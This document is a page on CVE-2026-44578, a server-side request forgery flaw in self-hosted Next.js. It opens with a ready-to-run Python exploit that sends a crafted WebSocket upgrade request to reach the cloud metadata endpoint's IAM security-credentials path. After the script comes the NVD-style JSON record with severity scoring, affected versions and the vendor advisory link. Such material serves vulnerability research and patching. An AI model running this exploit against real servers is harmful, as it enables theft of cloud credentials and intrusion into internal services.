CVE-2026-44578

import socket # Target vulnerable Next.js server target_host = "vulnerable-nextjs-app.com" target_port = 80 # Internal target to access (e.g., cloud metadata or internal admin panel) # The vulnerability allows proxying requests to arbitrary destinations via WebSocket upgrade internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = ( f"GET {internal_target} HTTP/1.1\r\n" f"Host: {target_host}\r\n" "Upgrade: websocket\r\n" "Connection: Upgrade\r\n" "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n" "Sec-WebSocket-Version: 13\r\n" "\r\n" ) print(f"Sending malicious WebSocket upgrade request to {target_host}...") with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((target_host, target_port)) s.sendall(payload.encode()) response = s.recv(4096) print("Response from internal target via SSRF:") print(response.decode())

{"cve": {"id": "CVE-2026-44578", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:17.990", "lastModified": "2026-05-14T18:34:38.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.4.13", "versionEndExcluding": "15.5.16", "matchCriteriaId": "9845CDE5-B999-458E-9FCE-E1D0F63B8AC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}